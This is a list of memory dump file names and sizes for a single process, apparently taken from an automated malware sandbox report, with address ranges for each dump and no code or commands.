    • memory/4668-220-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-214-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-210-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-208-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-216-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-222-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-204-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-218-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-212-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-201-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-250-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-248-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-246-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-1524-0x00000000056E0000-0x0000000005738000-memory.dmp

      Filesize

      352KB

    • memory/4668-1525-0x0000000004A80000-0x0000000004AD6000-memory.dmp

      Filesize

      344KB

    • memory/4668-1526-0x0000000005680000-0x00000000056CC000-memory.dmp

      Filesize

      304KB

    • memory/4668-200-0x00000000055E0000-0x0000000005672000-memory.dmp

      Filesize

      584KB

    • memory/4668-199-0x00000000053A0000-0x000000000549E000-memory.dmp

      Filesize

      1016KB

    • memory/4668-198-0x0000000005140000-0x0000000005366000-memory.dmp

      Filesize

      2.1MB

    • memory/4668-197-0x00000000005A0000-0x00000000007F0000-memory.dmp

      Filesize

      2.3MB

    • memory/4668-1539-0x00000000057D0000-0x0000000005824000-memory.dmp

      Filesize

      336KB